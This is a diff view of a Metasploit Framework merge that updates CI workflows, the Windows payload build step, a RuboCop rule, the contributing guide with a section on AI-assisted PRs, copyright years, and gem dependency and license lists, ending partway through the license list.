Merge pull request #21044 from adfoster-r7/fix-nessus-service-import-crash

Fix nessus service import crash
automatic module_metadata_base.json update
2026-03-02 20:45:09 +00:00 · 2026-03-02 20:08:10 +00:00 · 2026-03-02 13:58:44 -06:00 · 2026-03-02 19:43:36 +00:00 · 2026-03-02 16:29:05 +00:00 · 2026-03-02 16:19:29 +00:00
2239 changed files with 83495 additions and 22939 deletions
@@ -0,0 +1,19 @@
+name: Add pull request to the kanban board
+
+on:
+  pull_request_target:
+    types:
+       - opened
+       - reopened
+
+jobs:
+  add-to-project:
+    name: Add pull request to the kanban board
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/add-to-project@v1.0.2
+        with:
+          project-url: https://github.com/orgs/rapid7/projects/17
+          # smcintyre/GITHUB_PROJECT_TOKEN (PAT), Expires on Wed, Jan 27 2027
+          github-token: ${{ secrets.GH_PROJECT_TOKEN }}
+
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
+          - '3.3'

    name: Ruby ${{ matrix.ruby }}
    steps:
@@ -0,0 +1,68 @@
+name: Extended Tests
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  # This action can update/close pull requests
+  pull-requests: write
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  pull_request_target:
+    branches:
+      - '*'
+    paths:
+      - '**/**ldap**'
+      - '**/**kerberos**'
+      - '**/**gss**'
+
+jobs:
+  add-labels:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/github-script@v6
+        with:
+          github-token: ${{secrets.GITHUB_TOKEN}}
+          script: |
+            // NOTE: The following section is JavaScript. Note that backticks will need to be escaped within
+            // the multiline comment strings in the following config. When editing this file, using JavaScript
+            // syntax highlighting might be easier.
+            //
+            // This script has intentionally been inlined instead of using third-party Github actions for both
+            // security and performance reasons.
+            const currentLabelNames = context.payload.pull_request.labels.map(label => label.name);
+            const newLabelName = "additional-testing-required";
+            const comment = `
+              Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
+
+              We've added the \`${newLabelName}\` label to indicate that additional testing is required before this pull request can be merged.
+              For maintainers, this means visiting [here](https://jenkins-metasploit.build.r7ops.com/job/pro_manual_test_trigger/).
+            `;
+
+            if (!currentLabelNames.includes(newLabelName)) {
+              await github.rest.issues.addLabels({
+                issue_number: context.issue.number,
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                labels: [newLabelName]
+              });
+
+              const precedingWhitespaceLength = comment.split("\n")[1].search(/\S/);
+              const commentWithoutPrecedingWhitespace = comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
+              await github.rest.issues.createComment({
+                issue_number: context.issue.number,
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                body: commentWithoutPrecedingWhitespace
+              });
+            }
@@ -44,6 +44,7 @@ on:
      - 'Gemfile.lock'
      - 'data/templates/**'
      - 'modules/payloads/**'
+      - 'lib/msf/base/sessions/**'
      - 'lib/msf/core/payload/**'
      - 'lib/msf/core/**'
      - 'test/modules/**'
@@ -31,7 +31,7 @@ jobs:
          - ubuntu-latest
          - windows-2022
          - windows-2025
-          - macos-13
+          - macos-15-intel

    env:
      RAILS_ENV: test
@@ -67,7 +67,7 @@ jobs:
      fail-fast: false
      matrix:
        os:
-          - macos-13
+          - macos-15-intel
          - windows-2022
          - ubuntu-latest
        ruby:
@@ -92,7 +92,7 @@ jobs:
          # - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2025 }

          # Mettle
-          - { meterpreter: { name: mettle }, os: macos-13 }
+          - { meterpreter: { name: mettle }, os: macos-15-intel }
          - { meterpreter: { name: mettle }, os: ubuntu-latest }

    runs-on: ${{ matrix.os }}
@@ -192,7 +192,7 @@ jobs:
          ref: ${{ inputs.metasploit_framework_commit }}

      # https://github.com/orgs/community/discussions/26952
-      - name: Support longpaths
+      - name: Support longpaths when running on Windows
        if: runner.os == 'Windows'
        run: git config --system core.longpaths true

@@ -269,12 +269,26 @@ jobs:
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
-        shell: cmd
+        shell: pwsh
        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          make.bat
+          Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
+          dir
+          $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
+          $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
+          $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
+          $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
+          if ($process.ExitCode -eq 0) {
+            Write-Host "components have been successfully added"
+          } else {
+            Write-Host "components were not installed"
+            exit 1
+          }
+          Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
+          $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
+          Write-Host $r
+          $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
+          Write-Host $r
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
@@ -102,3 +102,6 @@ rspec.failures

 #Ignore any base disk store files
 db/modules_metadata_base.pstore
+
+# gradle build files
+**/.gradle
@@ -24,6 +24,7 @@ require:
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb
  - ./lib/rubocop/cop/lint/detect_metadata_trailing_leading_whitespace.rb
+  - ./lib/rubocop/cop/lint/detect_outdated_cmd_exec_api.rb

 Layout/SpaceBeforeBrackets:
  Enabled: true
@@ -676,3 +677,9 @@ Style/UnpackFirst:

 Lint/DetectMetadataTrailingLeadingWhitespace:
  Enabled: true
+
+Lint/DetectOutdatedCmdExecApi:
+  Description: >-
+    Detects outdated usage of cmd_exec with separate arguments.
+    Use `create_process(executable, args: [], time_out: 15, opts: {})` API with an args array instead.
+  Enabled: true
@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
 the incident involves a committer, you may report it directly to
-caitlin_condon@rapid7.com or todb@metasploit.com.
+smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.

 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.
@@ -8,10 +8,10 @@ Before we get into the details of contributing code, you should know there are m
 - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new/choose) with detailed information about your issue or idea:
 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
- - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
+ - [Help fellow users with open issues](https://github.com/rapid7/metasploit-framework/issues). This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
 - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
 - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
+ - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.


 ## Code Contributions
@@ -25,8 +25,10 @@ will be closed. We need to ensure the code we're adding to master is written to
 ## Expedited Module Creation Process
 We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR.  A good-faith PR might not even work, but it will show that the author is working their way toward a solution.  Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted.  This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc.  In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly.  If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree.  We sincerely hope that the original author will remain involved in this expedited module creation process.  We would appreciate testing, critiquing, and any assistance that can be offered.  If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible.  In these cases of minor code changes, the authorship of the module will remain unchanged.  We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.

-### Code Contribution Do's & Don'ts:
+## Vibecoding, AI, and LLM
+My first job had a token ring LAN and I still own a Win98SE CD, so I'm not entirely sure what _vibecoding_ is, but we're cool with any coding technique you use to create a PR as long as it is tested, documented, and does what it says it does.  Untested code is incomplete code, and incomplete code should be marked as a draft PR or WIP (Work in Progress) until it is complete, tested, and ready for a committer to review.  We have had several submissions clearly from AI that were well-formatted, looked really neat, and did nothing it said it did.  While we have no problem with AI-assisted coding, please do not assume that the code generated by an AI or LLM is logically or even syntactically correct.

+### Code Contribution Do's & Don'ts:
 Keeping the following in mind gives your contribution the best chance of landing!

 #### <u>Pull Requests</u>
@@ -42,7 +44,7 @@ Keeping the following in mind gives your contribution the best chance of landing
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** test your code.
+* **Do** test your code and submit the test output in your PR with any sensitive information removed.
 * **Do** list [verification steps] so committers can test your code.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
@@ -85,7 +87,7 @@ When reporting Metasploit issues:
 * **Don't** attempt to report issues on a closed PR.

 If you need some more guidance, talk to the main body of open source contributors over on our
-[Metasploit Slack] or [#metasploit on Freenode IRC].
+[GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) or [Metasploit Slack]

 Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
 curve, so keep it up!
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2025, Rapid7, Inc.
+Copyright (C) 2006-2026, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.79)
+    metasploit-framework (6.4.117)
      aarch64
      abbrev
      actionpack (~> 7.2.0)
@@ -21,6 +21,7 @@ PATH
      bson
      chunky_png
      csv
+      date (= 3.4.1)
      dnsruby
      drb
      ed25519
@@ -28,7 +29,7 @@ PATH
      em-http-request
      eventmachine
      faker
-      faraday (= 2.7.11)
+      faraday
      faraday-retry
      faye-websocket
      ffi (< 1.17.0)
@@ -45,9 +46,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.221)
+      metasploit-payloads (= 2.0.240)
      metasploit_data_models (>= 6.0.7)
-      metasploit_payloads-mettle (= 1.0.42)
+      metasploit_payloads-mettle (= 1.0.46)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -60,23 +61,25 @@ PATH
      network_interface
      nexpose
      nokogiri
-      octokit (~> 4.0)
+      octokit
      openssl-ccm
      openvas-omp
      ostruct
      packetfu
+      parallel
      patch_finder
      pcaprub
      pdf-reader
      pg
      puma
-      rack
+      rack (~> 2.2)
      railties
      rasn1 (= 0.14.0)
      rb-readline
      recog
      redcarpet
      reline
+      rest-client
      rex-arch
      rex-bin_tools
      rex-core
@@ -95,19 +98,20 @@ PATH
      rex-struct2
      rex-text
      rex-zip
+      rexml (= 3.4.1)
      rinda
      ruby-macho
      ruby-mysql
      ruby_smb (~> 3.3.15)
      rubyntlm
      rubyzip
-      sinatra
+      sinatra (~> 3.2)
      sqlite3 (= 1.7.3)
      sshkey
      stringio (= 3.1.1)
      swagger-blocks
      syslog
-      thin
+      thin (~> 1.x)
      tzinfo
      tzinfo-data
      unix-crypt
@@ -126,9 +130,9 @@ GEM
    aarch64 (2.1.0)
      racc (~> 1.6)
    abbrev (0.1.2)
-    actionpack (7.2.2.1)
-      actionview (= 7.2.2.1)
-      activesupport (= 7.2.2.1)
+    actionpack (7.2.2.2)
+      actionview (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      nokogiri (>= 1.8.5)
      racc
      rack (>= 2.2.4, < 3.2)
@@ -137,19 +141,19 @@ GEM
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
      useragent (~> 0.16)
-    actionview (7.2.2.1)
-      activesupport (= 7.2.2.1)
+    actionview (7.2.2.2)
+      activesupport (= 7.2.2.2)
      builder (~> 3.1)
      erubi (~> 1.11)
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
-    activemodel (7.2.2.1)
-      activesupport (= 7.2.2.1)
-    activerecord (7.2.2.1)
-      activemodel (= 7.2.2.1)
-      activesupport (= 7.2.2.1)
+    activemodel (7.2.2.2)
+      activesupport (= 7.2.2.2)
+    activerecord (7.2.2.2)
+      activemodel (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      timeout (>= 0.4.0)
-    activesupport (7.2.2.1)
+    activesupport (7.2.2.2)
      base64
      benchmark (>= 0.3)
      bigdecimal
@@ -164,10 +168,10 @@ GEM
    addressable (2.8.7)
      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
-    allure-rspec (2.26.0)
-      allure-ruby-commons (= 2.26.0)
+    allure-rspec (2.27.0)
+      allure-ruby-commons (= 2.27.0)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.26.0)
+    allure-ruby-commons (2.27.0)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
@@ -203,38 +207,38 @@ GEM
      aws-sigv4 (~> 1.5)
    aws-sigv4 (1.11.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    base64 (0.2.0)
+    base64 (0.3.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
    benchmark (0.4.1)
-    bigdecimal (3.2.2)
+    bigdecimal (3.2.3)
    bindata (2.4.15)
    bootsnap (1.18.4)
      msgpack (~> 1.2)
-    bson (5.0.2)
+    bson (5.1.1)
    builder (3.3.0)
-    byebug (11.1.3)
+    byebug (12.0.0)
    chunky_png (1.4.0)
    coderay (1.1.3)
    concurrent-ruby (1.3.5)
-    connection_pool (2.5.3)
+    connection_pool (2.5.4)
    cookiejar (0.3.4)
    crass (1.0.6)
    csv (3.3.2)
    daemons (1.4.1)
    date (3.4.1)
-    debug (1.10.0)
+    debug (1.11.0)
      irb (~> 1.10)
      reline (>= 0.3.8)
    diff-lcs (1.6.2)
-    dnsruby (1.72.4)
-      base64 (~> 0.2.0)
-      logger (~> 1.6.5)
+    dnsruby (1.73.1)
+      base64 (>= 0.2)
+      logger (~> 1.6)
      simpleidn (~> 0.2.1)
    docile (1.4.1)
    domain_name (0.6.20240107)
    drb (2.2.3)
-    ed25519 (1.3.0)
+    ed25519 (1.4.0)
    elftools (1.3.1)
      bindata (~> 2)
    em-http-request (1.1.7)
@@ -246,12 +250,12 @@ GEM
    em-socksify (0.3.3)
      base64
      eventmachine (>= 1.0.0.beta.4)
-    erb (5.0.2)
+    erb (5.0.3)
    erubi (1.13.1)
    eventmachine (1.2.7)
-    factory_bot (6.5.4)
+    factory_bot (6.5.5)
      activesupport (>= 6.1.0)
-    factory_bot_rails (6.5.0)
+    factory_bot_rails (6.5.1)
      factory_bot (~> 6.5)
      railties (>= 6.1.0)
    faker (3.5.1)
@@ -282,6 +286,7 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
+    http-accept (1.7.0)
    http-cookie (1.0.8)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
@@ -298,7 +303,7 @@ GEM
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.10.2)
+    json (2.15.1)
    language_server-protocol (3.17.0.5)
    license_finder (5.11.1)
      bundler
@@ -309,7 +314,7 @@ GEM
      xml-simple
    lint_roller (1.1.0)
    little-plugger (1.1.4)
-    logger (1.6.6)
+    logger (1.7.0)
    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
@@ -326,7 +331,7 @@ GEM
      mutex_m
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.16)
+    metasploit-credential (6.0.20)
      bigdecimal
      csv
      drb
@@ -339,7 +344,7 @@ GEM
      railties
      rex-socket
      rubyntlm
-      rubyzip
+      rubyzip (< 3.0.0)
    metasploit-model (5.0.4)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
@@ -347,26 +352,30 @@ GEM
      drb
      mutex_m
      railties (~> 7.0)
-    metasploit-payloads (2.0.221)
-    metasploit_data_models (6.0.9)
+    metasploit-payloads (2.0.240)
+    metasploit_data_models (6.0.12)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
+      bigdecimal
+      drb
      metasploit-concern
-      metasploit-model (>= 3.1)
+      metasploit-model (~> 5.0.4)
+      mutex_m
      pg
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.42)
+    metasploit_payloads-mettle (1.0.46)
    method_source (1.1.0)
-    mime-types (3.6.0)
+    mime-types (3.7.0)
      logger
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2025.0304)
+      mime-types-data (~> 3.2025, >= 3.2025.0507)
+    mime-types-data (3.2025.0924)
    mini_portile2 (2.8.9)
    minitest (5.25.5)
-    mqtt (0.6.0)
+    mqtt (0.7.0)
+      logger
    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.3)
@@ -384,15 +393,16 @@ GEM
    net-smtp (0.5.1)
      net-protocol
    net-ssh (7.3.0)
+    netrc (0.11.0)
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.4)
-    nokogiri (1.18.9)
+    nokogiri (1.18.10)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.1)
      bigdecimal
-    octokit (4.25.1)
+    octokit (10.0.0)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
    openssl-ccm (1.2.3)
@@ -402,7 +412,7 @@ GEM
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
    parallel (1.27.0)
-    parser (3.3.8.0)
+    parser (3.3.9.0)
      ast (~> 2.4.1)
      racc
    parslet (1.8.2)
@@ -415,24 +425,24 @@ GEM
      ruby-rc4
      ttfunk
    pg (1.5.9)
-    pp (0.6.2)
+    pp (0.6.3)
      prettyprint
    prettyprint (0.2.0)
-    prism (1.4.0)
-    pry (0.14.2)
+    prism (1.5.1)
+    pry (0.15.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.10.1)
-      byebug (~> 11.0)
-      pry (>= 0.13, < 0.15)
+    pry-byebug (3.11.0)
+      byebug (~> 12.0)
+      pry (>= 0.13, < 0.16)
    psych (5.2.6)
      date
      stringio
-    public_suffix (6.0.1)
+    public_suffix (6.0.2)
    puma (6.6.0)
      nio4r (~> 2.0)
    racc (1.8.1)
-    rack (2.2.17)
+    rack (2.2.19)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
@@ -450,9 +460,9 @@ GEM
    rails-html-sanitizer (1.6.2)
      loofah (~> 2.21)
      nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
-    railties (7.2.2.1)
-      actionpack (= 7.2.2.1)
-      activesupport (= 7.2.2.1)
+    railties (7.2.2.2)
+      actionpack (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      irb (~> 1.13)
      rackup (>= 1.0.0)
      rake (>= 12.2)
@@ -463,17 +473,23 @@ GEM
    rasn1 (0.14.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    rdoc (6.14.2)
+    rdoc (6.15.0)
      erb
      psych (>= 4.0.0)
+      tsort
    recog (3.1.14)
      nokogiri
    redcarpet (3.6.1)
-    regexp_parser (2.10.0)
+    regexp_parser (2.11.3)
    reline (0.6.2)
      io-console (~> 0.5)
    require_all (3.0.0)
-    rex-arch (0.1.18)
+    rest-client (2.1.0)
+      http-accept (>= 1.7.0, < 2.0)
+      http-cookie (>= 1.0.2, < 2.0)
+      mime-types (>= 1.16, < 4.0)
+      netrc (~> 0.8)
+    rex-arch (0.1.19)
      rex-text
    rex-bin_tools (0.1.10)
      metasm
@@ -481,14 +497,16 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.34)
+    rex-core (0.1.35)
    rex-encoder (0.1.8)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.41)
+    rex-exploitation (0.1.44)
+      bigdecimal
      jsobfu
      metasm
+      racc
      rex-arch
      rex-encoder
      rex-text
@@ -500,11 +518,12 @@ GEM
      rex-arch
    rex-ole (0.1.9)
      rex-text
-    rex-powershell (0.1.101)
+    rex-powershell (0.1.103)
+      bigdecimal
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.16)
+    rex-random_identifier (0.1.21)
      bigdecimal
      rex-text
    rex-registry (0.1.6)
@@ -512,7 +531,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.62)
+    rex-socket (0.1.64)
      dnsruby
      rex-core
    rex-sslscan (0.1.13)
@@ -530,7 +549,7 @@ GEM
      forwardable
      ipaddr
    rkelly-remix (0.0.7)
-    rspec (3.13.0)
+    rspec (3.13.1)
      rspec-core (~> 3.13.0)
      rspec-expectations (~> 3.13.0)
      rspec-mocks (~> 3.13.0)
@@ -542,7 +561,7 @@ GEM
    rspec-mocks (3.13.5)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (8.0.1)
+    rspec-rails (8.0.2)
      actionpack (>= 7.2)
      activesupport (>= 7.2)
      railties (>= 7.2)
@@ -552,7 +571,7 @@ GEM
      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.4)
+    rspec-support (3.13.6)
    rubocop (1.75.7)
      json (~> 2.3)
      language_server-protocol (~> 3.17.0.2)
@@ -564,7 +583,7 @@ GEM
      rubocop-ast (>= 1.44.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 4.0)
-    rubocop-ast (1.44.1)
+    rubocop-ast (1.47.1)
      parser (>= 3.3.7.2)
      prism (~> 1.4)
    ruby-macho (4.1.0)
@@ -616,15 +635,16 @@ GEM
    timeout (0.4.3)
    toml (0.2.0)
      parslet (~> 1.8.0)
+    tsort (0.2.0)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
    tzinfo-data (1.2025.1)
      tzinfo (>= 1.0.0)
-    unicode-display_width (3.1.4)
-      unicode-emoji (~> 4.0, >= 4.0.4)
-    unicode-emoji (4.0.4)
+    unicode-display_width (3.2.0)
+      unicode-emoji (~> 4.1)
+    unicode-emoji (4.1.0)
    unix-crypt (1.3.1)
    useragent (0.16.11)
    warden (1.2.9)
@@ -682,4 +702,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   2.5.10
+   2.5.22
@@ -2,7 +2,7 @@ Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: https://www.metasploit.com/

 Files: *
-Copyright: 2006-2025, Rapid7, Inc.
+Copyright: 2006-2026, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -2,15 +2,15 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 2.0.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.2.2.1, MIT
-actionview, 7.2.2.1, MIT
-activemodel, 7.2.2.1, MIT
-activerecord, 7.2.2.1, MIT
-activesupport, 7.2.2.1, MIT
+actionpack, 7.2.2.2, MIT
+actionview, 7.2.2.2, MIT
+activemodel, 7.2.2.2, MIT
+activerecord, 7.2.2.2, MIT
+activesupport, 7.2.2.2, MIT
 addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.26.0, "Apache 2.0"
-allure-ruby-commons, 2.26.0, "Apache 2.0"
+allure-rspec, 2.27.0, "Apache 2.0"
+allure-ruby-commons, 2.27.0, "Apache 2.0"
 arel-helpers, 2.16.0, MIT
 ast, 2.4.3, MIT
 aws-eventstream, 1.3.2, "Apache 2.0"
@@ -23,41 +23,41 @@ aws-sdk-kms, 1.99.0, "Apache 2.0"
 aws-sdk-s3, 1.182.0, "Apache 2.0"
 aws-sdk-ssm, 1.191.0, "Apache 2.0"
 aws-sigv4, 1.11.0, "Apache 2.0"
-base64, 0.2.0, "ruby, Simplified BSD"
+base64, 0.3.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
 benchmark, 0.4.1, "ruby, Simplified BSD"
-bigdecimal, 3.2.2, "ruby, Simplified BSD"
+bigdecimal, 3.2.3, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
-bson, 5.0.2, "Apache 2.0"
+bson, 5.1.1, "Apache 2.0"
 builder, 3.3.0, MIT
-bundler, 2.5.10, MIT
-byebug, 11.1.3, "Simplified BSD"
+bundler, 2.5.22, MIT
+byebug, 12.0.0, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
 concurrent-ruby, 1.3.5, MIT
-connection_pool, 2.5.3, MIT
+connection_pool, 2.5.4, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
 date, 3.4.1, "ruby, Simplified BSD"
-debug, 1.10.0, "ruby, Simplified BSD"
+debug, 1.11.0, "ruby, Simplified BSD"
 diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
-dnsruby, 1.72.4, "Apache 2.0"
+dnsruby, 1.73.1, "Apache 2.0"
 docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 drb, 2.2.3, "ruby, Simplified BSD"
-ed25519, 1.3.0, MIT
+ed25519, 1.4.0, MIT
 elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.3, MIT
-erb, 5.0.2, "ruby, Simplified BSD"
+erb, 5.0.3, "ruby, Simplified BSD"
 erubi, 1.13.1, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.4, MIT
-factory_bot_rails, 6.5.0, MIT
+factory_bot, 6.5.5, MIT
+factory_bot_rails, 6.5.1, MIT
 faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
@@ -74,6 +74,7 @@ gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
+http-accept, 1.7.0, MIT
 http-cookie, 1.0.8, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.9.0, ruby
@@ -83,30 +84,30 @@ ipaddr, 1.2.7, "ruby, Simplified BSD"
 irb, 1.15.2, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.10.2, ruby
+json, 2.15.1, ruby
 language_server-protocol, 3.17.0.5, MIT
 license_finder, 5.11.1, MIT
 lint_roller, 1.1.0, MIT
 little-plugger, 1.1.4, MIT
-logger, 1.6.6, "ruby, Simplified BSD"
+logger, 1.7.0, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
 loofah, 2.24.1, MIT
 lru_redux, 1.1.0, MIT
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.5, "New BSD"
-metasploit-credential, 6.0.16, "New BSD"
-metasploit-framework, 6.4.79, "New BSD"
+metasploit-credential, 6.0.20, "New BSD"
+metasploit-framework, 6.4.117, "New BSD"
 metasploit-model, 5.0.4, "New BSD"
-metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.9, "New BSD"
-metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.240, "3-clause (or ""modified"") BSD"
